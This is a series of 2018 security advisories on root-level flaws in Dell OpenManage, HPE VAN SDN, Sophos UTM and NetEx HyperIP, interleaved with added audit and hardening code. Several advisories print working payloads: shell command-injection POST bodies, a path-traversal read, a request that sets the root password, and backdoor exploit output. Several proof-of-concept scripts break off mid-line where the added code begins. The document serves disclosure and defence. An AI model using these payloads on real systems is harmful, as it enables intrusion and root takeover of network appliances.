KL-001-2018-009 : Dell OpenManage Network Manager Multiple Vulnerabilities
Title: Dell OpenManage Network Manager Multiple Vulnerabilities
Advisory ID: KL-001-2018-009
Publication Date: 2018.11.05
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-009.txt

1. Vulnerability Details

   Affected Vendor: Dell
   Affected Product: OpenManage Network Manager
   Affected Version: 6.2.0.51 SP3
   Platform: Embedded Linux
   CWE Classification: CWE-285: Improper Authorization, CWE-284: Improper Access Control
   Impact: Privilege Escalation
   Attack vector: MySQL, HTTP
   CVE ID: CVE-2018-15767, CVE-2018-15768

2. Vulnerability Description

   Dell OpenManage Network Manager exposes a MySQL listener that can be accessed with default credentials (CVE-2018-15768). This MySQL service is running as the root user, so an attacker can exploit this configuration to, e.g., deploy a backdoor and escalate privileges into the root account (CVE-2018-15767).

3. Technical Description

   The appliance binds on 3306/mysql using the 0.0.0.0 IP address. The default IPTables policy is ACCEPT and the rule table is empty. Using any of three default accounts, a malicious user can exploit native MySQL functionality to place a JSP shell into the directory of a web server on the file system and subsequently make calls into it.

4. Mitigation and Remediation Recommendation

   The vendor informed KoreLogic that all default passwords can be changed and are documented in the OpenManage Network Manager Installation Guide. Dell recommends all customers change these default passwords upon installation.

   The vendor has addressed these vulnerabilities in version 6.5.3. Release notes and download instructions can be found at:
   https://www.dell.com/support/home/us/en/04/drivers/driversdetails?driverId=5XC0J

5. Credit

   This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

   2018.02.16 - KoreLogic submits vulnerability details to Dell.
   2018.02.16 - Dell acknowledges receipt.
   2018.04.02 - Dell informs KoreLogic that a remediation plan is in place and requests approximately two months continued embargo on the vulnerability details.
   2018.04.23 - 45 business days have elapsed since the vulnerability was reported to Dell.
   2018.05.14 - 60 business days have elapsed since the vulnerability was reported to Dell.
   2018.06.05 - 75 business days have elapsed since the vulnerability was reported to Dell.
   2018.06.11 - Dell informs KoreLogic that the patched version has been released and asks that the KoreLogic advisory remain unpublished until 2018.06.22.
   2018.06.21 - Dell requests additional time to coordinate changes to the MySQL implementation, noting that this driver is provided by an upstream vendor.
   2018.07.11 - 100 business days have elapsed since the vulnerability was reported to Dell.
   2018.07.16 - Dell informs KoreLogic that the remediations are targeted for version 6.5.3, slated for a September release.
   2018.08.08 - 120 business days have elapsed since the vulnerability was reported to Dell.
   2018.09.20 - 150 business days have elapsed since the vulnerability was reported to Dell.
   2018.10.03 - Dell informs KoreLogic that version 6.5.3 is scheduled to be released 2018.10.08.
   2018.10.11 - Dell and KoreLogic begin mutual review of disclosure statements.
   2018.11.02 - Dell issues public advisory: https://www.dell.com/support/article/us/en/19/sln314610; 180 business days have elapsed since the vulnerability was reported to Dell.
   2018.11.05 - KoreLogic Disclosure.

7. Proof of Concept

   #!/usr/bin/python
   # $ python dell-openmanage-networkmanager_rce.py --host 1.3.3.7
   # Dell OpenManage NetworkManager 6.2.0.51 SP3
   # SQL backdoor remote root
   #
   # [-] Starting attack.
   # [+] Connected using root account.
   # [+] Sending malicious SQL.
   # [+] Dropping shell.
   # [-] uid=0(root) gid=0(root) groups=0(root)
   #
   # # uname -a
   # Linux synergy.domain.int 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

   from optparse import OptionParser
   from string import ascii_letters, digits
   from random import choice
   from re import compile as regex_compile
   from urllib import urlopen
   import pymysql.cursors

   banner = """Dell OpenManage NetworkManager 6.2.0.51 SP3\nSQL backdoor remote root\n"""
   accounts =
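The three conditions in the Technical Description (mysqld bound to 0.0.0.0, mysqld running as root, an ACCEPT INPUT policy with no rules) can be checked from configuration alone. The following audit script is an added example, not KoreLogic's or Dell's code: it parses the [mysqld] section of a my.cnf and the output of `iptables -S`, and reports each of the three findings. The configuration and rule-dump texts embedded below are constructed samples, one reproducing the weak state the advisory describes and one hardened for comparison.

```python
"""Audit a MySQL host for the exposure pattern described in KL-001-2018-009.

Added example (not KoreLogic's or Dell's code). The my.cnf and `iptables -S`
texts are constructed samples; on a real host feed it the live files."""
import re
from typing import Dict, List

# Constructed sample: the weak configuration the advisory describes.
WEAK_MY_CNF = """\
[client]
port=3306

[mysqld]
user=root
bind-address=0.0.0.0
port=3306
datadir=/var/lib/mysql
"""

# Constructed sample: a hardened configuration for comparison.
HARDENED_MY_CNF = """\
[mysqld]
user=mysql
bind-address=127.0.0.1
port=3306
"""

# Constructed samples of `iptables -S` output (policies, then rules).
EMPTY_ACCEPT_RULES = "-P INPUT ACCEPT\n-P FORWARD ACCEPT\n-P OUTPUT ACCEPT\n"
RESTRICTIVE_RULES = """\
-P INPUT DROP
-P FORWARD DROP
-P OUTPUT ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
"""


def parse_mysqld_section(my_cnf: str) -> Dict[str, str]:
    """Return key/value pairs from the [mysqld] section only.
    Keys are normalised so bind_address and bind-address compare equal."""
    section = None
    values: Dict[str, str] = {}
    for raw in my_cnf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        if section == "mysqld" and "=" in line:
            key, value = line.split("=", 1)
            values[key.strip().replace("_", "-").lower()] = value.strip()
    return values


def audit_mysql_exposure(my_cnf: str, iptables_dump: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing flagged."""
    findings: List[str] = []
    mysqld = parse_mysqld_section(my_cnf)
    # An absent bind-address means "all interfaces" on MySQL 5.6 and later.
    bind = mysqld.get("bind-address", "0.0.0.0")
    if bind in ("0.0.0.0", "::", "*"):
        findings.append("mysqld listens on all interfaces (bind-address=%s)" % bind)
    if mysqld.get("user", "") == "root":
        findings.append("mysqld runs as root; a SQL compromise becomes a root compromise")
    lines = [l.strip() for l in iptables_dump.splitlines() if l.strip()]
    input_policy = next((l.split()[2] for l in lines if l.startswith("-P INPUT ")), None)
    has_rules = any(l.startswith(("-A ", "-I ")) for l in lines)
    if input_policy == "ACCEPT" and not has_rules:
        findings.append("iptables INPUT policy is ACCEPT with an empty rule table")
    return findings


if __name__ == "__main__":
    for name, cnf, rules in (("weak", WEAK_MY_CNF, EMPTY_ACCEPT_RULES),
                             ("hardened", HARDENED_MY_CNF, RESTRICTIVE_RULES)):
        print(name, audit_mysql_exposure(cnf, rules) or ["no findings"])
```

The default-credential issue (CVE-2018-15768) is not something a config parser can see; that one is closed by changing the three default accounts' passwords as the Installation Guide describes, and the listener change above limits who can reach them in the first place.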
KL-001-2018-008 : HPE VAN SDN Unauthenticated Remote Root Vulnerability
Title: HPE VAN SDN Unauthenticated Remote Root Vulnerability
Advisory ID: KL-001-2018-008
Publication Date: 2018.06.25
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt

1. Vulnerability Details

   Affected Vendor: HP Enterprise
   Affected Product: VAN SDN Controller
   Affected Version: 2.7.18.0503
   Platform: Embedded Linux
   CWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-20: Improper Input Validation
   Impact: Privilege Escalation
   Attack vector: HTTP

2. Vulnerability Description

   A hardcoded service token can be used to bypass authentication. Built-in functionality can be exploited to deploy and execute a malicious deb file containing a backdoor. A weak sudoers configuration can then be abused to escalate privileges to root. A second issue can be used to deny use of the appliance by continually rebooting it.

3. Technical Description

   The exploit will automatically attempt to bypass authentication unless the --no-auth-bypass flag is provided. If that flag is provided, the --username and --password flags must also be given. The options for the --payload flag are: rce-root and pulse-reboot. The default option is rce-root. The pulse-reboot payload will reboot the target device until the attack is stopped.

   $ python hpevansdn-multiple_exploits.py --help
   HPE VAN SDN Controller 2.7.18.0503
   Unauthenticated Remote Root and Denial-of-Service

   Usage: hpevansdn-multiple_exploits.py [options]

   Options:
     -h, --help            show this help message and exit
     --target=REMOTE_IP    Target IP address
     --no-auth-bypass      No authentication bypass
     --username=USERNAME   Username (Default: sdn)
     --password=PASSWORD   Password (Default: skyline)
     --payload=PAYLOAD     Payload: rce-root(default), pulse-reboot

   Below is output for the rce-root payload:

   $ python hpevansdn-multiple_exploits.py --target 1.3.3.7
   HPE VAN SDN Controller 2.7.18.0503
   Unauthenticated Remote Root and Denial-of-Service
   [+] Authentication successfully bypassed.
   [-] Starting remote root exploit.
   [-] Building backdoor.
   [-] Uploading backdoor.
   [+] Upload successful.
   [-] Installing backdoor.
   [+] Starting backdoor on port 49370.
   [+] Connected to backdoor.
   * For interactive root shell please run /var/lib/sdn/uploads/root-V6mlQNqW
   id
   uid=108(sdnadmin) gid=1000(sdn) groups=1000(sdn)
   /var/lib/sdn/uploads/root-V6mlQNqW
   root@medium-hLinux:/opt/sdn/admin# uname -a
   Linux medium-hLinux 4.4.0-2-amd64-hlinux #hlinux1 SMP Thu Jan 28 12:35:26 UTC 2016 x86_64 GNU/Linux
   root@medium-hLinux:/opt/sdn/admin# exit
   [-] Removing backdoor.
   [+] Backdoor removed.

4. Mitigation and Remediation Recommendation

   The vendor issued the following statement:

   HPE had evaluated the impact of service token being leaked and previously updated the security procedure in VAN 2.8.8 Admin Guide page 129. The full guide is here - http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-a3662en_us-1.pdf. HPE expects all customers to update their service token, admin token, default sdn user password, and edit iptables as described in the guideline. If the guideline was followed, the exploit would not be successful.

5. Credit

   This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

   2018.02.16 - KoreLogic submits vulnerability details to HPE.
   2018.02.16 - HPE acknowledges receipt.
   2018.04.02 - 30 business days have elapsed since the vulnerability was reported to HPE.
   2018.04.23 - 45 business days have elapsed since the vulnerability was reported to HPE.
   2018.05.04 - KoreLogic requests an update on the status of the remediation.
   2018.05.14 - 60 business days have elapsed since the vulnerability was reported to HPE.
   2018.06.05 - 75 business days have elapsed since the vulnerability was reported to HPE.
   2018.06.11 - KoreLogic requests an update on the status of the remediation.
   2018.06.12 - HPE responds with the statement documented in Section 4. Mitigation and Remediation Recommendation.
   2018.06.25 - KoreLogic public disclosure.

7. Proof of Concept

   from optparse import OptionParser
   from random import randrange,choice
   from threading import Thread
   from os import mkdir,makedirs,system,listdir,remove
   from string import ascii_letters,digits
   from subprocess import check_output
   from requests import get,post
   from requests.utils import dict_from_cookiejar
   from requests.exceptions import
KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service
Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service
Advisory ID: KL-001-2018-007
Publication Date: 2018.03.02
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-007.txt

1. Vulnerability Details

   Affected Vendor: Sophos
   Affected Product: UTM 9
   Affected Version: 9.410
   Platform: Embedded Linux
   CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation)
   Impact: Privilege Escalation
   Attack vector: SSH

2. Vulnerability Description

   The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, the running service is accessible over a network port on the loopback interface. By replaying the network traffic required to obtain a SID from this service it is possible to escalate privileges to root.

3. Technical Description

   1. Obtain a privileged session token

      $ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7
      loginuser@1.3.3.7's password:
      $ python kl-loginuser-confd-priv_esc.py
      pojiZSqWEUAUDNIQtSop

   2. Using that session token, set the root password

      POST /webadmin.plx HTTP/1.1
      Host: 1.3.3.7:
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
      Accept: text/javascript, text/html, application/xml, text/xml, */*
      Accept-Language: en-US,en;q=0.5
      X-Requested-With: XMLHttpRequest
      X-Prototype-Version: 1.5.1.1
      Content-Type: application/json; charset=UTF-8
      Referer: https://1.3.3.7:/
      Content-Length: 422
      Cookie: SID=pojiZSqWEUAUDNIQtSop
      DNT: 1
      Connection: close

      {"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}

      HTTP/1.1 200 OK
      Date: Thu, 23 Mar 2017 15:33:53 GMT
      Server: Apache
      Expires: Thursday, 01-Jan-1970 00:00:01 GMT
      Pragma: no-cache
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Option: nosniff
      X-XSS-Protection: 1; mode=block
      Vary: Accept-Encoding
      Connection: close
      Content-Type: application/json; charset=utf-8
      Content-Length: 178895

      {"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000]

   3. Look for success message.

      "objs":[{"success":[{"text":"Shell user password(s) set successfully."}]

   4. Profit.

      loginuser@[redacted]:/home/login > su
      Password:
      [redacted]:/home/login # id
      uid=0(root) gid=0(root) groups=0(root),890(xorp)

4. Mitigation and Remediation Recommendation

   The vendor has addressed this vulnerability in version 9.508. Release notes and download instructions can be found at:
   https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-508-released

5. Credit

   This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

   2017.07.21 - KoreLogic submits vulnerability details to Sophos.
   2017.07.21 - Sophos acknowledges receipt.
   2017.09.01 - 30 business days have elapsed since the vulnerability was reported to Sophos.
   2017.09.15 - KoreLogic requests an update on the status of this and other vulnerabilities reported to Sophos.
   2017.09.18 - Sophos informs KoreLogic that this issue will require additional engineering and requests an extension of the disclosure timeline.
   2017.09.25 - 45 business days have elapsed since the vulnerability was reported to Sophos.
   2017.11.07 - 75 business days have elapsed since the vulnerability was reported to Sophos.
   2017.12.14 - 100 business days have elapsed since the vulnerability was reported to Sophos.
   2018.01.12 - KoreLogic requests an update from Sophos.
   2018.01.15 - Sophos informs KoreLogic that the expected release date for the UTM 9.5 MR 6 version containing the mitigation is the middle of February.
   2018.01.16 - 120 business days have elapsed since the vulnerability was reported to Sophos.
   2018.02.28 - 150 business days have elapsed since the vulnerability was reported to Sophos.
   2018.03.01 - UTM 9.508 released by Sophos.
   2018.03.02 - KoreLogic public disclosure.

7. Proof of Concept

   from socket import socket,AF_INET,SOCK_STREAM
KL-001-2018-005 : NetEx HyperIP Local File Inclusion Vulnerability
Title: NetEx HyperIP Local File Inclusion Vulnerability
Advisory ID: KL-001-2018-005
Publication Date: 2018.02.08
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-005.txt

1. Vulnerability Details

   Affected Vendor: NetEx
   Affected Product: HyperIP
   Affected Version: 6.1.0
   Platform: Embedded Linux
   CWE Classification: CWE-73: External Control of File Name or Path, CWE-592: Authentication Bypass Issues
   Impact: Arbitrary Filesystem Reads
   Attack vector: HTTPS

2. Vulnerability Description

   Local files can be included within the HTTP response given by logs.php.

3. Technical Description

   Any arbitrary file, such as the one created in KL-001-2018-004, can be returned by the logs.php script.

   GET /logs.php?system=../../tmp/a.output=Show+System+Log HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 13:07:51 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Content-Length: 502
   Connection: close
   Content-Type: text/html; charset=UTF-8

   Show System Log [ Monday @ 08:07:51 ]
   uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

4. Mitigation and Remediation Recommendation

   The vendor has released version 6.1.1 of HyperIP, which they state addresses this vulnerability.

5. Credit

   This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

   2017.07.24 - KoreLogic submits vulnerability details to NetEx.
   2017.07.24 - NetEx confirms receipt.
   2017.08.16 - NetEx informs KoreLogic that this and other reported vulnerabilities have been addressed in the forthcoming release. ETA as of yet undetermined.
   2017.09.05 - 30 business days have elapsed since the vulnerability was reported to NetEx.
   2017.09.19 - NetEx informs KoreLogic that the forthcoming release 6.1.1 is expected to ship at the end of January 2018.
   2017.09.26 - 45 business days have elapsed since the vulnerability was reported to NetEx.
   2017.12.01 - 90 business days have elapsed since the vulnerability was reported to NetEx.
   2018.01.17 - 120 business days have elapsed since the vulnerability was reported to NetEx.
   2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release has gone live.
   2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

   See 3. Technical Description.

The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
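The logs.php request above succeeds because the `system` parameter is joined onto a path and opened as-is. The handler logic below is an added example, not NetEx's code (the real handler is PHP and is not reproduced): it maps request names to files through an explicit allowlist, and as a second layer confines whatever path results to the log directory with a realpath/commonpath check. The log directory and the log names are assumed for illustration.

```python
"""Hardened replacement for a "show this log" handler, illustrating the fix
for the traversal in KL-001-2018-005 (logs.php?system=../../tmp/a.output).

Added example, not NetEx's code. LOG_BASE and the entries in ALLOWED_LOGS
are assumptions made for illustration."""
import os
import re
from typing import Dict

LOG_BASE = "/var/log/hyperip"  # assumed location of the viewable logs
# Preferred control: an explicit allowlist from request name to file name.
ALLOWED_LOGS: Dict[str, str] = {
    "system": "system.log",
    "messages": "messages",
}
# Defence in depth: a log name is a single path component, nothing else.
NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def resolve_log_path(base_dir: str, requested: str) -> str:
    """Confine `requested` under base_dir; raise ValueError on traversal."""
    if not requested or not NAME_RE.match(requested):
        raise ValueError("log name contains characters outside the allowed set")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath rather than startswith, so /var/log/hyperip2 is not accepted
    # as being inside /var/log/hyperip
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("requested path escapes the log directory")
    return candidate


def select_log(system_param: str) -> str:
    """Handler logic: allowlist lookup first, path confinement second."""
    if system_param not in ALLOWED_LOGS:
        raise ValueError("unknown log name %r" % system_param)
    return resolve_log_path(LOG_BASE, ALLOWED_LOGS[system_param])


def demo() -> Dict[str, str]:
    """Exercise the handler on valid names, on the advisory's traversal
    string, and on a bare '..' that passes the name regex but not the
    confinement check."""
    results: Dict[str, str] = {}
    for name in ("system", "messages", "../../tmp/a.output", ".."):
        try:
            if name in ALLOWED_LOGS:
                results[name] = select_log(name)
            else:
                results[name] = resolve_log_path(LOG_BASE, name)
        except ValueError as exc:
            results[name] = "rejected: %s" % exc
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print("%-22s -> %s" % (name, outcome))
```

The allowlist alone would have been enough for this endpoint, since a log viewer has a fixed, small set of files to show; the confinement check is there so that a later change which accepts a file name from the request does not silently reintroduce the issue.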
KL-001-2018-004 : NetEx HyperIP Privilege Escalation Vulnerability
Title: NetEx HyperIP Privilege Escalation Vulnerability
Advisory ID: KL-001-2018-004
Publication Date: 2018.02.08
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-004.txt

1. Vulnerability Details

   Affected Vendor: NetEx
   Affected Product: HyperIP
   Affected Version: 6.1.0
   Platform: Embedded Linux
   CWE Classification: CWE-592: Authentication Bypass Issues
   Impact: Privilege Escalation
   Attack vector: HTTPS

2. Vulnerability Description

   Privileges can be escalated by abusing writable paths found within the sudoers configuration file.

3. Technical Description

   The run script is modified with the attack payload.

   POST /hypmisc.php HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   Cookie: auth-token=b6b73844ce4df64f459948c5475a1096
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 90

   set_id=msglvl_val=$(echo /usr/bin/id >> /var/ftp/pub/updates/a.run)=on=Set

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 07:21:38 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Expires: Thu, 19 Nov 1981 08:52:00 GMT
   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
   Pragma: no-cache
   Content-Length: 1048
   Connection: close
   Content-Type: text/html; charset=UTF-8

   The attack payload can now be executed.

   POST /hypmisc.php HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   Cookie: auth-token=b6b73844ce4df64f459948c5475a1096
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 91

   set_id=msglvl_val=$(sudo /var/ftp/pub/updates/a.run >> /tmp/a.output)=on=Set

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 13:06:55 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Expires: Thu, 19 Nov 1981 08:52:00 GMT
   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
   Pragma: no-cache
   Content-Length: 1020
   Connection: close
   Content-Type: text/html; charset=UTF-8

   The output can now be read from the a.output file, which is a separate arbitrary file read issue detailed in KL-001-2018-005.

   GET /logs.php?system=../../tmp/a.output=Show+System+Log HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 13:07:51 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Content-Length: 502
   Connection: close
   Content-Type: text/html; charset=UTF-8

   Show System Log [ Monday @ 08:07:51 ]
   uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

4. Mitigation and Remediation Recommendation

   The vendor has released version 6.1.1 of HyperIP, which they state addresses this vulnerability.

5. Credit

   This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

   2017.07.24 - KoreLogic submits vulnerability details to NetEx.
   2017.07.24 - NetEx confirms receipt.
   2017.08.16 - NetEx informs KoreLogic that this and other reported vulnerabilities have been addressed in the forthcoming release. ETA as of yet undetermined.
   2017.09.05 - 30 business days have elapsed since the vulnerability was reported to NetEx.
   2017.09.19 - NetEx informs KoreLogic that the forthcoming release 6.1.1 is expected to ship at the end of January 2018.
   2017.09.26 - 45 business days have elapsed since the vulnerability was reported to NetEx.
   2017.12.01 - 90 business days have elapsed since the vulnerability was reported to NetEx.
   2018.01.17 - 120 business days have elapsed since the vulnerability was reported to NetEx.
   2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release has gone live.
   2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

   See 3. Technical Description.
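The root cause here is a sudoers entry whose command lives in a directory the web user can write to, so appending to the script rewrites what sudo will run as root. The audit below is an added example, not NetEx's code: it extracts the command paths from user-specification lines of a sudoers file and reports any whose file or parent directory is group- or world-writable. The sudoers text is a constructed sample, and the files it points at are created in a temporary directory with the relevant permission bits so the check runs anywhere.

```python
"""Find sudoers command paths that non-root users could modify, the
misconfiguration behind KL-001-2018-004.

Added example, not NetEx's code. The sudoers text is constructed and the
target files are created in a temporary directory for the demo."""
import os
import re
import stat
import tempfile
from typing import List, Tuple

# Constructed sudoers sample; {bad} sits in a world-writable directory.
SUDOERS_TEMPLATE = """\
Defaults    env_reset
root    ALL=(ALL) ALL
apache  ALL=(root) NOPASSWD: {bad}, {good}
"""

USERSPEC_RE = re.compile(r"^(\S+)\s+\S+=\([^)]*\)\s*(.*)$")
TAG_RE = re.compile(r"^(?:[A-Z]+:\s*)+")  # NOPASSWD:, SETENV:, ...


def parse_sudoers_commands(text: str) -> List[Tuple[str, str]]:
    """Return (user, absolute command path) pairs from user specifications.
    Aliases, Defaults and the 'ALL' command are skipped."""
    pairs: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = USERSPEC_RE.match(line)
        if not m:
            continue
        user, cmdspec = m.group(1), m.group(2)
        for cmd in cmdspec.split(","):
            cmd = TAG_RE.sub("", cmd.strip())
            path = cmd.split()[0] if cmd else ""
            if path.startswith("/"):
                pairs.append((user, path))
    return pairs


def writable_by_others(path: str) -> bool:
    """True if the file or its parent directory is group- or world-writable.
    A sticky world-writable directory (like /tmp) is exempted because other
    users cannot replace files there. A missing path returns False."""
    for p in (path, os.path.dirname(path)):
        try:
            st = os.stat(p)
        except FileNotFoundError:
            return False
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX:
                continue
            return True
    return False


def audit_sudoers(text: str) -> List[Tuple[str, str]]:
    """Return the (user, path) entries whose target can be tampered with."""
    return [(u, p) for u, p in parse_sudoers_commands(text) if writable_by_others(p)]


def demo() -> List[Tuple[str, str]]:
    """Build the two targets with the relevant modes and run the audit."""
    with tempfile.TemporaryDirectory() as tmp:
        bad_dir = os.path.join(tmp, "updates")
        good_dir = os.path.join(tmp, "sbin")
        os.mkdir(bad_dir)
        os.chmod(bad_dir, 0o777)   # the flaw: anyone can drop or rewrite files here
        os.mkdir(good_dir)
        os.chmod(good_dir, 0o755)
        bad = os.path.join(bad_dir, "a.run")
        good = os.path.join(good_dir, "service")
        for p in (bad, good):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(p, 0o755)
        return audit_sudoers(SUDOERS_TEMPLATE.format(bad=bad, good=good))


if __name__ == "__main__":
    for user, path in demo():
        print("%s may run %s as root, but that path is writable by others" % (user, path))
```

On a real system the same check should also walk every ancestor directory and consider ownership, since a script owned by the web user in a root-owned directory is just as editable; the two-level check here is kept short to show the idea.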
KL-001-2018-003 : NetEx HyperIP Post-Auth Command Execution
Title: NetEx HyperIP Post-Auth Command Execution
Advisory ID: KL-001-2018-003
Publication Date: 2018.02.08
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-003.txt

1. Vulnerability Details

   Affected Vendor: NetEx
   Affected Product: HyperIP
   Affected Version: 6.1.0
   Platform: Embedded Linux
   CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command, CWE-250: Execution with Unnecessary Privileges
   Impact: Arbitrary Command Execution
   Attack vector: HTTPS

2. Vulnerability Description

   A command injection vulnerability can be leveraged to execute operating system commands.

3. Technical Description

   A POST variable is handled unsafely, allowing execution of arbitrary commands with the privileges of the webserver process. In the below example, set_val= is used to copy an existing executable file into a writable directory.

   POST /hypmisc.php HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   Cookie: auth-token=b6b73844ce4df64f459948c5475a1096
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 99

   set_id=msglvl_val=$(cp /etc/profile.d/which-2.sh /var/ftp/pub/updates/a.run)=on=Set

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 07:20:56 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Expires: Thu, 19 Nov 1981 08:52:00 GMT
   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
   Pragma: no-cache
   Content-Length: 1057
   Connection: close
   Content-Type: text/html; charset=UTF-8

4. Mitigation and Remediation Recommendation

   The vendor has released version 6.1.1 of HyperIP, which they state addresses this vulnerability.

5. Credit

   This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

   2017.07.24 - KoreLogic submits vulnerability details to NetEx.
   2017.07.24 - NetEx confirms receipt.
   2017.08.16 - NetEx informs KoreLogic that this and other reported vulnerabilities have been addressed in the forthcoming release. ETA as of yet undetermined.
   2017.09.05 - 30 business days have elapsed since the vulnerability was reported to NetEx.
   2017.09.19 - NetEx informs KoreLogic that the forthcoming release 6.1.1 is expected to ship at the end of January 2018.
   2017.09.26 - 45 business days have elapsed since the vulnerability was reported to NetEx.
   2017.12.01 - 90 business days have elapsed since the vulnerability was reported to NetEx.
   2018.01.17 - 120 business days have elapsed since the vulnerability was reported to NetEx.
   2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release has gone live.
   2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

   See 3. Technical Description.
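The message-level parameter only ever needs to carry a small number, yet the handler hands it to a shell where `$(...)` is expanded. The code below is an added example, not NetEx's code (the real handler is PHP and is not reproduced here): it shows the two controls a reviewer would ask for, a strict validator with an argv-list invocation that never touches a shell, and a detection pass that flags request bodies carrying shell syntax in that parameter. The level-setting tool is a stand-in Python one-liner so the example runs anywhere; the request bodies are constructed samples, one of them mirroring the advisory's payload.

```python
"""Hardened handling of the msglvl_val parameter from KL-001-2018-003, plus a
detection check over request bodies.

Added example, not NetEx's code. The level-setting tool is a stand-in
(a Python one-liner) and the request bodies are constructed samples."""
import re
import subprocess
import sys
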